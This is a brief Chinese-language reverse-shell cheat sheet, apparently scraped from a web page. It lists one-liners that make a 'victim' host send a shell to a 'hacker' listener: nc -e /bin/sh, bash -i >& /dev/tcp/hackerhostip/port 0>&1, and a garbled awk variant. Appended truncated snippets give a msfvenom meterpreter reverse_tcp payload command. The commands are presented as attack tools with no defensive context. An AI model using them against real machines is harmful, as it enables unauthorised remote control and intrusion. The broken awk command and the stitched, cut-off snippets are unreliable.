一、基於awk
hacker機器上執行命令:
nc -l port
hacker機器一直監聽某埠。
在受害主機上執行命令:
awk 'begin } while(c != "exit") close(s); }}' /dev/n
受害主機主動向hacker傳送shell連線。
二、純nc
hacker機器上執行命令:
nc -l port
hacker機器一直監聽某埠。
在受害主機上執行命令:
nc -e /bin/sh hackerhostip port
受害主機主動向hacker傳送shell連線。
三、萬能
hacker機器上先執行命令:
nc -l port
hacker機器一直監聽某埠。
在受害主機上執行命令:
bash -i >& /dev/tcp/hackerhostip/port 0>&1
受害主機主動向hacker傳送shell連線。
注:有時受害主機上可能會缺少我們需要的軟體,如nc一類的。
反彈shell集錦
就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...
使用NC命令反彈Shell
本文使用兩台電腦操作,一台是kali 192.168.0.23 一台是mac 192.168.0.24 有些電腦不支援,而且跟機器使用順序還有關係。比如我在kali上 192.168.0.23 輸入 root kali nc l 1234在mac上 192.168.0.24 輸入 nc 192.16...
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...